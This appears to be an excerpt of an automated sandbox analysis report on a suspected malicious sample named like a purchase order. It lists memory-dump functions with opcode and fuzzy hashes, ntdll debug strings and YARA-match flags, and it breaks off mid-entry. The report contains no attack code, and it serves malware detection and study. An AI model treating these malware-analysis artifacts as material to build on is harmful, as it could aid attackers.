                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d291318ad4637d885bdb4cb1b064c4ac7039286c7f158ef43348aeed2c31a52
                                                      • Instruction ID: ff11fc8910e93830b548b7839b64a1a001bdc0d7afd85ae6e62de43ae0db6dac
                                                      • Opcode Fuzzy Hash: 8d291318ad4637d885bdb4cb1b064c4ac7039286c7f158ef43348aeed2c31a52
                                                      • Instruction Fuzzy Hash: EF90022324546102D150719C44056164085B7E1211F59C421E0814998DCA9589556321
                                                      Function 01513D70 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63030dcab276916c7cd34f1704404334cfb1353637e7fbff9156d551223b6c28
                                                      • Instruction ID: 21886ffe48eefaf81f964c90c13c4986b25415866b1cb9ab49ba7703fb6c0142
                                                      • Opcode Fuzzy Hash: 63030dcab276916c7cd34f1704404334cfb1353637e7fbff9156d551223b6c28
                                                      • Instruction Fuzzy Hash: 2090023720141402D5107198580564600C6A7D1311F59D811E042495CDCB9489A1A221
                                                      Function 01513D10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e745b328f06c6344c9a2f6ff46925ee57cc3bd750bdb1d6ba3d025a2b5c31e1
                                                      • Instruction ID: c69ac099f3c80980c13c7c95324269f60bb1ff27f97d626d914a864cf044b2cd
                                                      • Opcode Fuzzy Hash: 8e745b328f06c6344c9a2f6ff46925ee57cc3bd750bdb1d6ba3d025a2b5c31e1
                                                      • Instruction Fuzzy Hash: 1B90023320241142954072985805A4E4185A7E2312B99D815E0015958CCE5489615321
                                                      Function 01512C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: 3aa530bd9f9da46c43373b1a0acd4f4e5db6b312c331b1a8573885668b0fdd4a
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Function 01512890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: c91673bea96281769799926cbf028d6a6402208403c978aed691629fc0c77e2a
                                                      • Instruction ID: 4d71cf93870a32284e4e170306e336cb7e6c1f891b409e8fc2fc425ce4abf445
                                                      • Opcode Fuzzy Hash: c91673bea96281769799926cbf028d6a6402208403c978aed691629fc0c77e2a
                                                      • Instruction Fuzzy Hash: B551D7B6A00216BFEB12DF9C899097EFBF8BB48240B64C129F555DB645D334DE408BE0
                                                      Function 01582410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: aa97458d6092c39f1a225a12572c782ca8f0ce6d407fbc779da3c01aba610752
                                                      • Instruction ID: 7f09cc2e5ac3dfe9c1942077c0a6c8929c37776639c540b51da3c9774ba94be5
                                                      • Opcode Fuzzy Hash: aa97458d6092c39f1a225a12572c782ca8f0ce6d407fbc779da3c01aba610752
                                                      • Instruction Fuzzy Hash: 5451F4B5A40646AEDB20EE5DC89097FBFF8BF44200F44885AE4D6EF681E674DA00C770
                                                      Function 01507630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Execute=1, xrefs: 01544713
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01544725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015446FC
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01544655
                                                      • ExecuteOptions, xrefs: 015446A0
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01544787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01544742
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                      • Instruction ID: 74c2498aa8ab1d8cd795a21788d5c85d019b3ebdd593dda598d1dae989d098e7
                                                      • Opcode Fuzzy Hash: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                      • Instruction Fuzzy Hash: 89514B3160020ABBEF12EAE8DC95FAD77A8BF58744F14009AD606AF1D1D770AA458F50
                                                      Function 0151B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: f5e176e961f0b6da425b7870111e6e4e95e77a4c474b9f3dadefdedc69d8df11
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 5081D170E0524A9EFF278E6CC8907FEBBB1BF55720F184A19D851AF299C7348840CB61
                                                      Function 015820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                      • Instruction ID: e8786bc6c5ef11444cbc83e810c3bab9418f133a1d60c9a0c69fe5c39b74707d
                                                      • Opcode Fuzzy Hash: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                      • Instruction Fuzzy Hash: 5921657AA0011AABDB11EF79CC40AEE7FF8FF54644F54012AE905E7244E730D911CBA1
                                                      Function 014FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015402BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015402E7
                                                      • RTL: Re-Waiting, xrefs: 0154031E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                      • Instruction ID: 72ba8d594e570dbccb1e3aae0c4933d82d8ca7fd677fa2a5113966577b62e800
                                                      • Opcode Fuzzy Hash: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                      • Instruction Fuzzy Hash: 7BE1B2316087429FE725CF28C884B5ABBE0BF84714F240A5EF6A58B3E1D774D849CB42
                                                      Function 0150BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01547B7F
                                                      • RTL: Resource at %p, xrefs: 01547B8E
                                                      • RTL: Re-Waiting, xrefs: 01547BAC
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                      • Instruction ID: 807058155cd81d3a44174f106b8b8a3c69af269eac6b63c19e3b0557252c29b0
                                                      • Opcode Fuzzy Hash: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                      • Instruction Fuzzy Hash: 6141D1353007039FD726DE69C880B6AB7E5FB98710F100A1EF9669F280EB71E8058B91
                                                      Function 0150B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0154728C
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 015472A3
                                                      • RTL: Re-Waiting, xrefs: 015472C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01547294
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                      • Instruction ID: a63b01235db0345fa8c167f9d94fc83f02739ebc9e86db1ee72517f8d1716b09
                                                      • Opcode Fuzzy Hash: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                      • Instruction Fuzzy Hash: 0541D035704203ABD721DE69CC81F6AB7A6FB98714F100A1AF955AF280DB71F94287E1
                                                      Function 01582300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                      • Instruction ID: 107506d1d61f036fb0fe57c0eb4cf3202bdf8afb1c4346a8631a2d7d116a8fd5
                                                      • Opcode Fuzzy Hash: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                      • Instruction Fuzzy Hash: C6315476A002199FDB20DE2DCC50BEEBBF8FF54650F94455AE949E7240EF309A44CBA0
                                                      Function 01517D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: c4743d285e126930926dd09acfa3ca83470034b349d5f8689e92f456643c011d
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 22919471E0020A9EFB26DF6DC8806BFBBE5BF48320F54461AE965EF2C8D73499408751
                                                      Function 014D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
                                                      • Instruction ID: 9aeca95fc6eea966c6af3190808e44f1d80aa36803d58e5230bb297310d15e39
                                                      • Opcode Fuzzy Hash: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
                                                      • Instruction Fuzzy Hash: 59811871D006699BDB31CF54CC54BEEBBB4AF58714F0441EAAA19BB290D7709E848FA0
                                                      Function 0155CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0155CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                      • Instruction ID: 50ca93421b75053aac0ab0ef921e2d322dca5992136350db1f0449ca82d97822
                                                      • Opcode Fuzzy Hash: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                      • Instruction Fuzzy Hash: A9418B72900219DFDB219FA9C890AADBBF8FF64B50F00452FE915DF264E7748901CB61

                                                      Executed Functions

                                                      Function 05A4A0DB Relevance: 44.3, Strings: 35, Instructions: 580COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ){$-$/$1U$?b$D$E.$H$O2$SC$U$W$^$a.$c/$f?$h)$kP$m$p0$p{$s7$t$t$td$y$y $z${${*$5$8$:$?$c
                                                      • API String ID: 0-298092976
                                                      • Opcode ID: eef4c3cfc7834d10831a79b8691fe5d6420aa4485afa700d4920f4f5b418bf60
                                                      • Instruction ID: 6c396a713067ca54f1560a3e3c2e2de490656fe4a74c6183651540675ddae821
                                                      • Opcode Fuzzy Hash: eef4c3cfc7834d10831a79b8691fe5d6420aa4485afa700d4920f4f5b418bf60
                                                      • Instruction Fuzzy Hash: 5F52E4B0D45229CBEB64CF44C898BEDBBB2BB85308F5081D9C55DAB281DB755AC9CF40
                                                      Function 05A57EE2 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: 9cfcdf914b61ef3ed95cfcdae33ecec8b7a31b1a1b335d31bf589f8acbe28d43
                                                      • Instruction ID: 5f031f4d3c1e9561d076212fb6f82ba5d502ed4da7c3f4c038f824beb55cecbc
                                                      • Opcode Fuzzy Hash: 9cfcdf914b61ef3ed95cfcdae33ecec8b7a31b1a1b335d31bf589f8acbe28d43
                                                      • Instruction Fuzzy Hash: 155195B2D01118ABDB10EF94DD48EFEB378EF54710F1481A9ED09A7140E7799B49CBA1
                                                      Function 05A66592 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: |+
                                                      • API String ID: 0-1861213509
                                                      • Opcode ID: 0c0e33db91fc4e611c125b1b884d7ef8cd9aba9aa6b741b915e955736ba3b0e0
                                                      • Instruction ID: 194fa8f52f7a7beab321425bf11d3906d5f37a925bdb0f039b7a749055a327ba
                                                      • Opcode Fuzzy Hash: 0c0e33db91fc4e611c125b1b884d7ef8cd9aba9aa6b741b915e955736ba3b0e0
                                                      • Instruction Fuzzy Hash: 871103B6D01218AF8B00DFA9D9449EEBBF9FF48200F04456AE919E7200E7709A15CBA1
                                                      Function 05A651C2 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: J
                                                      • API String ID: 0-2788708132
                                                      • Opcode ID: 7f2845d3d5ba2b01ac91a2109498841856eef70e20632890da3c77eae1d4f4a1
                                                      • Instruction ID: 385273ad0e5bb6c89e28b7c5454cc1528c690c2e05fb7814526420587785d6f3
                                                      • Opcode Fuzzy Hash: 7f2845d3d5ba2b01ac91a2109498841856eef70e20632890da3c77eae1d4f4a1
                                                      • Instruction Fuzzy Hash: 1F01E9B2D01218AFCB40DFE8D9459EEBBF9BB48200F14466AE915F3200F77457048FA1
                                                      Function 05A43EF9 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: q
                                                      • API String ID: 0-4110462503
                                                      • Opcode ID: 469d3cb63c329a5b65af07ced30c7e219c74c520f9914a5a04e0fe2bb1cdecc2
                                                      • Instruction ID: 3e6f8d1f4e9838eca8190db37169509066a430adab628f07eb9b5056f6a413f4
                                                      • Opcode Fuzzy Hash: 469d3cb63c329a5b65af07ced30c7e219c74c520f9914a5a04e0fe2bb1cdecc2
                                                      • Instruction Fuzzy Hash: 57F0B4736142266BDB11AE9DEC44F86B7ACFF84330F240222FA188F240D776D8518BA0
                                                      Function 05A43DA3 Relevance: .1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09529cdbe3c669854afbe121c38b47859b0118a23344137977120941a17f3f98
                                                      • Instruction ID: c9685c1246d5e52d007a63d49dcdfe4a58cb54a2dbb3bd49dcc5755afe932071
                                                      • Opcode Fuzzy Hash: 09529cdbe3c669854afbe121c38b47859b0118a23344137977120941a17f3f98
                                                      • Instruction Fuzzy Hash: 80410AB1D11219AFDB04CF99C885EEEBBBCFF49710F10855AFA14E7241E7B496418BA0
                                                      Function 05A43F5B Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67017a15356df7926ca5a9cdf18c9baca3400c2a7fab34f0e84aa8a2f10f2a1b
                                                      • Instruction ID: 9ca560e39284f42037589b4ded0930525271bb6505790b6250af1f1ee12bcdbf
                                                      • Opcode Fuzzy Hash: 67017a15356df7926ca5a9cdf18c9baca3400c2a7fab34f0e84aa8a2f10f2a1b
                                                      • Instruction Fuzzy Hash: 372196B26001157BDB14CE9ADC85FFBBBACEF88360F10455AFA08D7281D675D9518BA0
                                                      Function 05A68862 Relevance: .1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dec76ad0c146e4db94993d21df2ff2390b6eae607fd9265a0521f3988ca7766b
                                                      • Instruction ID: b19e49ddb082430570c17878517a5c36cd1089cf128f8ff5697e0cbacec59789
                                                      • Opcode Fuzzy Hash: dec76ad0c146e4db94993d21df2ff2390b6eae607fd9265a0521f3988ca7766b
                                                      • Instruction Fuzzy Hash: E231D7B5A10608AFDB14DF99D981EEFB7F9EF88700F108209F919A7240D774A911CFA1
                                                      Function 05A691C2 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9170488303db209a0151bc1abc469a32a06b9183e3f303daff5e23321fdc668d
                                                      • Instruction ID: 5b523bfb96b6f917ed6eecd4800cd82edd830373637cd2636c112d37814bb571
                                                      • Opcode Fuzzy Hash: 9170488303db209a0151bc1abc469a32a06b9183e3f303daff5e23321fdc668d
                                                      • Instruction Fuzzy Hash: B92114B5A00208AFDB14DFA9DD85EEFB7B8EF88310F008109F919A7240D674A911CFA1
                                                      Function 05A57D22 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48448117a190dfa5b0aea144372d05b9435cf4a896fa61f984a8cd24165eeafe
                                                      • Instruction ID: bf65b102b1c94d9df9d3ada90d6280405aaf0ee589320ee51c300baabbeae3ff
                                                      • Opcode Fuzzy Hash: 48448117a190dfa5b0aea144372d05b9435cf4a896fa61f984a8cd24165eeafe
                                                      • Instruction Fuzzy Hash: F91186B23802057BF7209E559C46FAB379CDB95B54F244015FF04AA1C0D6B5F91247B4
                                                      Function 05A684F2 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37e6aa967498a2ff3b9f7b8ac7a7a956e1c51130ed8c24835966a3f3d09ddf3a
                                                      • Instruction ID: db2165463d34108d91b34a52f37632f542bf991f099ace94f452f77401c41647
                                                      • Opcode Fuzzy Hash: 37e6aa967498a2ff3b9f7b8ac7a7a956e1c51130ed8c24835966a3f3d09ddf3a
                                                      • Instruction Fuzzy Hash: 46116071A00208AFD714EBA9DD45FEF77ACEF84300F008549FA59A7240D774AA11CFA1
                                                      Function 05A68672 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a35b7892066766386da6d5e5bc71a5f1869d27b51a8e5bb8d4689a4c74f53aac
                                                      • Instruction ID: 2faa3046acd173bbf8def45c62e88ead6693da835d94a41d41d3ef3d2ecd2d53
